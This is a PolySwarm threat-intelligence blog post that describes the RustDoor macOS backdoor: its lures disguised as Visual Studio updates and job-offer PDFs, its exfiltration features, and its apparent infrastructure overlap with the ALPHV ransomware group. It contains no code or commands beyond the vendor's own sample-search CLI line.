The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

RustDoor MacOS Backdoor

Feb 26, 2024 11:51:18 AM / by The Hivemind

RustDoorRelated Families: GateDoor
Verticals Targeted: Cryptocurrency

Executive Summary

RustDoor is a new MacOS backdoor written in Rust. RustDoor was observed targeting companies in the cryptocurrency sector.

Key Takeaways

  • RustDoor is a new MacOS backdoor written in Rust. 
  • RustDoor was observed targeting companies in the cryptocurrency sector.
  • GateDoor is a Windows version of RustDoor.
  • RustDoor uses infrastructure linked to the ALPHV ransomware gang, causing industry researchers to speculate whether there is a relationship between the threat actors.

What is RustDoor?

RustDoor is a new MacOS backdoor written in Rust. RustDoor was observed targeting companies in the cryptocurrency sector. The campaign has been active since at least November 2023, and at least three variants of RustDoor have been identified. Bitdefender recently reported on this activity. 

RustDoor, which can run on both Intel-based and Apple Silicon architectures, is stealthily distributed by masquerading as a Visual Studio update. Some of the first-stage downloaders used by RustDoor are disguised as PDF files with job offerings. However, when the victim takes the bait, the scripts download and execute malware while opening a decoy PDF. Other first-stage payloads are distributed as ZIP archives that claim to contain job information. These contain a basic shell script that fetches the implant while displaying a decoy PDF.

RustDoor is capable of exfiltrating and uploading files and obtaining information about infected devices. Bitdefender discovered four related Go-based binaries that collect information about the victim system and its network connections and communicate with an actor-controlled C2. These binaries can also obtain details about the disk and the kernel parameters and configuration values.

Researchers at Bitdefender noted the attacks in this campaign appear to be targeted. So far, only three victims have been confirmed - two in Hong Kong and a third in Lagos, Nigeria.


S2W reportedly discovered RustDoor in December 2023, although Bitdefender is credited with naming the backdoor. S2W researchers also identified a Windows version of RustDoor, which they named GateDoor. GateDoor is written in Go but functions similarly to RustDoor.

Links to Other Threat Actors?

It is interesting to note that RustDoor uses infrastructure linked to the ALPHV ransomware gang, which we featured in a recent Threat Bulletin. Three of the four C2 servers used by RustDoor overlap with infrastructure previously used by ALPHV or an ALPHV affiliate. Industry researchers noted other artifacts and IOCs suggest a possible relationship with BlackBasta. At this time, it is unclear whether the infrastructure is threat actor-controlled or part of a bulletproof hosting service that may be used by multiple unrelated threat actors. 


PolySwarm has multiple samples of RustDoor.
























You can use the following CLI command to search for all RustDoor samples in our portal:

$ polyswarm link list -f RustDoor

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at | Check out our blog | Subscribe to our reports.


Topics: Threat Bulletin, Ransomware, ALPHV, Backdoor, MacOS, Mac, Apple, RustDoor, GateDoor

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts